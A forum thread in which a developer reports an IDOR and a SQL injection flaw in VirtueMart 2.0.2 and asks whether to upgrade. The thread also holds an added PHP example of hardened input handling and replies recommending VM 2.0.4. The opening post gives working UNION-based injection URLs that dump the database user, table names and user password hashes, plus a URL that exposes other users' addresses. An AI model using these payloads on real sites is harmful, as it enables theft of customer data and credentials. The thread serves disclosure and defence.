
What should I do?

Started by teobgeno, April 09, 2012, 20:01:17 PM


teobgeno

Hello all,
I am working on a site with Joomla 1.5.25 and VM 2.0.2. Yesterday I noticed in http://docs.joomla.org/Vulnerable_Extensions_List#virtuemart_2.0.2
the vulnerability about VM 2.0.2. I also noticed that VM 2.0.2 has now been listed as "Vulnerable" in the Joomla Extensions Directory (JED).

A week earlier I read a post on this forum, which seems to have been deleted by now (http://forum.virtuemart.net/index.php?topic=99686.0), explaining a security issue: a frontend user (no need to be registered) can view the personal data of other users. So I tried it to see if that is true. Unfortunately, it is true. This bug exists in the section where a user adds a new address. If you add virtuemart_userinfo_id to the URL
and this user id exists, the form below will be filled with this user's data. Below I provide the URL:


index.php?option=com_virtuemart&view=user&task=editAddressSt&new=%20&addrtype=ST&cid%208%20=64&Itemid=30&virtuemart_userinfo_id=[USER_ID]

In components/com_virtuemart/views/user.view.html.php at line 126:

    if ($new) {
        $virtuemart_userinfo_id = 0;
    } else {
        $virtuemart_userinfo_id = JRequest::getString('virtuemart_userinfo_id', '0', '');
    }

$virtuemart_userinfo_id is set here, which means it takes the value of the virtuemart_userinfo_id parameter from $_GET[] provided by the URL above. Some lines below you can see that this $virtuemart_userinfo_id is sent to the following call, at line 149:

    $userFields = $this->_model->getUserInfoInUserFields($layoutName, $address_type, $virtuemart_userinfo_id);


So, as I said before, I saw this warning about the SQL injection vulnerability for VM 2.0.2.

http://secunia.com/advisories/48713

On secunia.com there is a reference to the original post at http://forum.virtuemart.net/index.php?topic=99999.0 . My first question is: where is that post? Why (if that happened) was it deleted?

Finally I found this post
http://forum.virtuemart.net/index.php?topic=100819.0
saying that all this matter about the exploits is a false alert.


The advisory at http://secunia.com/advisories/48713 describes the vulnerability:

  Input passed via the "virtuemart_userinfo_id" POST parameter to index.php/virtue-mart-edit-address (when "option" is set to "com_virtuemart") is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
 
 
And then I remembered the issue about the hack concerning virtuemart_userinfo_id and the user data (the one I already described). But that is not an SQL injection vulnerability, I thought. So I checked again to be sure.

Again in components/com_virtuemart/views/user.view.html.php at line 126:

    if ($new) {
        $virtuemart_userinfo_id = 0;
    } else {
        $virtuemart_userinfo_id = JRequest::getString('virtuemart_userinfo_id', '0', '');
    }

And then I realized it uses getString when virtuemart_userinfo_id should be an int. So virtuemart_userinfo_id can also be a string?
Surely not properly sanitised.

I made some tests and unfortunately the SQL injection bug exists. Below I provide some SQL injection URLs I made on my Joomla 1.5.25 / VM 2.0.2 / Windows XP / XAMPP setup:
   
   http://localhost/photo/index.php?option=com_virtuemart&view=user&task=editAddressSt&new=%27&addrtype=ST&cid[8]=64&Itemid=30&virtuemart_userinfo_id=dd"+union+all+select+1,2,3,4,5,6,7,8,user(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--"

http://localhost/photo/index.php?option=com_virtuemart&view=user&task=editAddressSt&new=%27&addrtype=ST&cid[8]=64&Itemid=30&virtuemart_userinfo_id=dd"+union+all+select+1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--"


http://localhost/photo/index.php?option=com_virtuemart&view=user&task=editAddressSt&new=%27&addrtype=ST&cid[8]=64&Itemid=30&virtuemart_userinfo_id=dd"+union+all+select+1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables+WHERE+table_schema='123456'--"


http://localhost/photo/index.php?option=com_virtuemart&view=user&task=editAddressSt&new=%27&addrtype=ST&cid[8]=64&Itemid=30&virtuemart_userinfo_id=dd"+union+all+select+1,2,3,4,5,6,7,8,group_concat(username,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users+WHERE+id='64'--"


This exploit unfortunately works. All the URLs above echo (database user, database name, table names of my db, username-password of users) in the name field of the frontend form. Also, to be absolutely sure, I downloaded the 2.0.2 (stable) from http://virtuemart.net/ today in case there is a fix.

As I said, this test was made on my machine. This exploit could be prevented if the machine that hosts the site has security plugins preventing SQL injections (e.g. Apache mod_security). But in reality this bug exists!!

In conclusion, I must say that the VirtueMart team has made a great application and I will not blame them for these bugs, especially when this piece of code is open source. I am a programmer and I know that when you make an application there is no doubt that a bug will exist. For me that is no problem: the bug will appear and you will fix it, that is ok. But...

Since this application has to do with money transfers and many people rely on it for their companies and their profit, you cannot in any case say "It is mainly a false alert. All the hacks do not work". NO, write: THE EXPLOIT EXISTS, DOWNLOAD THE APPLICATION AT YOUR OWN RISK!!!! or DOWNLOAD THIS FIX FOR 2.0.2.

So I have a site with Joomla 1.5.25 and VM 2.0.2 and it must be live in 1 week. It is 90% complete.

My question is: what should I do? Download 2.0.3? Try to fix the bugs in 2.0.2? Wait for a fix for 2.0.2?

Please give me a suggestion.

Thank you, and excuse my English.
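The post above identifies two distinct defects in the address form: an integer id read with getString and passed on to a query, and a well-formed id that belongs to a different user being accepted without any ownership check. The following is an added example, not VirtueMart's code or its actual fix, written as plain PHP so it runs without Joomla. It puts the weak pattern beside a hardened one for each defect. The function names, the ADDRESS_OWNERS table, and the table and column names in the SQL strings are assumptions; the Joomla 1.5 calls named in the comments (JRequest::getInt, JFactory::getUser, $db->Quote) are the real equivalents.

```php
<?php
// Added example, not VirtueMart's own code or its fix. Plain PHP, no Joomla dependency.
// Hypothetical names: readUserinfoId, resolveEditableUserinfoId, ADDRESS_OWNERS,
// and the #__virtuemart_userinfos table / virtuemart_user_id column used in the SQL.

// Constructed sample ownership table: userinfo_id => owning Joomla user id.
const ADDRESS_OWNERS = [
    64 => 7,
    65 => 8,
];

// --- Defect 1: an integer id read as a free-form string and concatenated into SQL.
// This mirrors JRequest::getString('virtuemart_userinfo_id', '0', '') feeding a query.
function buildQueryInsecure(array $request): string
{
    $id = $request['virtuemart_userinfo_id'] ?? '0';
    // Whatever the client sent becomes part of the query text, quotes included.
    return 'SELECT * FROM #__virtuemart_userinfos WHERE virtuemart_userinfo_id = "' . $id . '"';
}

// Hardened: enforce the type at the request boundary. Joomla 1.5 equivalent:
// JRequest::getInt('virtuemart_userinfo_id', 0). The cast is a stand-in for getInt's
// behaviour, not its exact algorithm: non-numeric input collapses to 0, which the
// view already treats as "no record".
function readUserinfoId(array $request): int
{
    return (int) ($request['virtuemart_userinfo_id'] ?? '0');
}

// --- Defect 2: a valid id belonging to another user pre-fills the form with that
// user's data. Hardened: only pre-fill when the record belongs to the logged-in user.
// Joomla 1.5 equivalent for the current user id: JFactory::getUser()->id.
function resolveEditableUserinfoId(array $request, int $currentUserId, array $owners): ?int
{
    $id = readUserinfoId($request);
    if ($id === 0) {
        return null;                       // "new address": nothing to pre-fill
    }
    if (!isset($owners[$id]) || $owners[$id] !== $currentUserId) {
        return null;                       // not this user's record: refuse to load it
    }
    return $id;
}

// Hardened query: the id is already an int by type, and the ownership condition is part
// of the SQL itself, so the database cannot return another user's row even if the check
// above were skipped by some other code path. Joomla 1.5's JDatabase has no bind API;
// there the same effect comes from (int) casts plus $db->Quote() on any string values.
function buildQuerySecure(int $userinfoId, int $currentUserId): array
{
    return [
        'sql'    => 'SELECT * FROM #__virtuemart_userinfos '
                  . 'WHERE virtuemart_userinfo_id = ? AND virtuemart_user_id = ?',
        'params' => [$userinfoId, $currentUserId],
    ];
}

// Demonstration on constructed requests: a non-numeric value, and the id of a record
// that belongs to user 8 requested while logged in as user 7.
$nonNumeric       = ['virtuemart_userinfo_id' => 'not a number'];
$otherUsersRecord = ['virtuemart_userinfo_id' => '65'];
$ownRecord        = ['virtuemart_userinfo_id' => '64'];

echo buildQueryInsecure($nonNumeric), PHP_EOL;   // the raw string is inside the SQL text
var_dump(readUserinfoId($nonNumeric));           // hardened reader: integer only
var_dump(resolveEditableUserinfoId($otherUsersRecord, 7, ADDRESS_OWNERS));
var_dump(resolveEditableUserinfoId($ownRecord, 7, ADDRESS_OWNERS));
print_r(buildQuerySecure(64, 7));
```

Run with `php example.php`. The insecure builder shows the request value embedded verbatim in the query; the hardened reader turns the non-numeric value into 0, the ownership check returns null for user 8's record when user 7 asks for it and returns the id only for the user's own record, and the final query carries both the id and the current user id as bound parameters rather than as text. The type fix alone closes the injection; the ownership condition is what closes the data disclosure the post describes first.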

John2400

Hi teobgeno,

I will just suggest that Joomla 1.5 posts and updates have moved on - version 2.5.2 had serious security issues and they are at 2.5.4.

Also, today you will see that VM has had multiple releases - even as I post, VM 2.0.4 stable has just been released.


teobgeno

Thank you for your reply.
I will update to VM 2.0.4 and I will patch Joomla 1.5.25 -> 1.5.26.